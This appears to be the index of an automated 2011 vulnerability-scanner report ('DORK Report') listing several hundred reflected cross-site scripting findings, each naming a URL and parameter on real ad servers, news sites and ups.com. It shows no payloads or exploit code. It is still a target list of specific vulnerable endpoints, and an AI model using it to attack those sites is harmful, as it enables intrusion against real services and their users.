DORK Report, Cross Site Scripting, 2-14-2011, XSS, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 08:58:26 CST 2011.


1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

1.10. http://a.rfihub.com/sed [pa parameter]

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.79. http://api.dimestore.com/viapi [id parameter]

1.80. http://api.echoenabled.com/v1/search [q parameter]

1.81. http://api.facebook.com/restserver.php [method parameter]

1.82. http://api.facebook.com/restserver.php [method parameter]

1.83. http://api.facebook.com/restserver.php [query parameter]

1.84. http://api.facebook.com/restserver.php [urls parameter]

1.85. http://api.js-kit.com/v1/count [q parameter]

1.86. http://ar.voicefive.com/b/rc.pli [func parameter]

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

1.107. http://bid.openx.net/json [c parameter]

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter]

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

1.171. http://ebay.adnxs.com/ttj [pt1 parameter]

1.172. http://ebay.adnxs.com/ttj [pt2 parameter]

1.173. http://ebay.adnxs.com/ttj [pt3 parameter]

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter]

1.175. http://event.adxpose.com/event.flow [uid parameter]

1.176. http://ib.adnxs.com/ab [cnd parameter]

1.177. http://ib.adnxs.com/ab [custom_macro parameter]

1.178. http://ib.adnxs.com/ptj [redir parameter]

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

1.188. http://js.revsci.net/gateway/gw.js [csid parameter]

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter]

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

1.192. http://kona5.kontera.com/KonaGet.js [l parameter]

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter]

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter]

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter]

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter]

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter]

1.200. http://mads.cbsnews.com/mac-ad [CID parameter]

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter]

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter]

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

1.208. http://mads.cbsnews.com/mac-ad [POS parameter]

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter]

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter]

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter]

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

1.233. http://odb.outbrain.com/utils/get [callback parameter]

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

1.239. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter]

1.240. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter]

1.241. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter]

1.242. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter]

1.243. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter]

1.244. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter]

1.245. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

1.246. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.247. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

1.248. http://r.turn.com/server/pixel.htm [fpid parameter]

1.249. http://r.turn.com/server/pixel.htm [sp parameter]

1.250. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter]

1.251. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

1.252. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

1.253. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]

1.254. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter]

1.255. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter]

1.256. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter]

1.257. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

1.258. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

1.259. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

1.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

1.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

1.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

1.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

1.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

1.265. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

1.266. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.267. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.268. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.269. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.270. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.271. http://uk.reuters.com/assets/commentsChild [articleId parameter]

1.272. http://uk.reuters.com/assets/commentsChild [channel parameter]

1.273. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]

1.274. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

1.275. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

1.276. http://uk.reuters.com/tracker/guid [cb parameter]

1.277. http://web.adblade.com/imps.php [description_color parameter]

1.278. http://web.adblade.com/imps.php [img_pad parameter]

1.279. http://web.adblade.com/imps.php [title_color parameter]

1.280. http://widgets.digg.com/buttons/count [url parameter]

1.281. http://www.dianomioffers.co.uk/smartads.epl [id parameter]

1.282. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter]

1.283. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter]

1.284. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter]

1.285. http://www.ups.com/bussol [WT.svl parameter]

1.286. http://www.ups.com/bussol [actionID parameter]

1.287. http://www.ups.com/bussol [actionID parameter]

1.288. http://www.ups.com/bussol [contentID parameter]

1.289. http://www.ups.com/bussol [contentID parameter]

1.290. http://www.ups.com/bussol [loc parameter]

1.291. http://www.ups.com/bussol [loc parameter]

1.292. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.293. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.294. http://www.ups.com/bussol [viewID parameter]

1.295. http://www.ups.com/bussol [viewID parameter]

1.296. http://www.ups.com/bussol/ [WT.svl parameter]

1.297. http://www.ups.com/bussol/ [loc parameter]

1.298. http://www.ups.com/bussol/ [loc parameter]

1.299. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.300. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.301. http://www.ups.com/bussol/ [viewID parameter]

1.302. http://www.ups.com/bussol/ [viewID parameter]

1.303. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

1.304. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

1.305. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

1.306. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

1.307. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

1.308. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

1.309. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

1.310. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

1.311. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

1.312. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

1.313. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

1.314. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

1.315. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

1.316. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

1.317. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

1.318. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

1.319. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

1.320. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

1.321. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

1.322. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

1.323. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

1.324. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

1.325. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

1.326. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

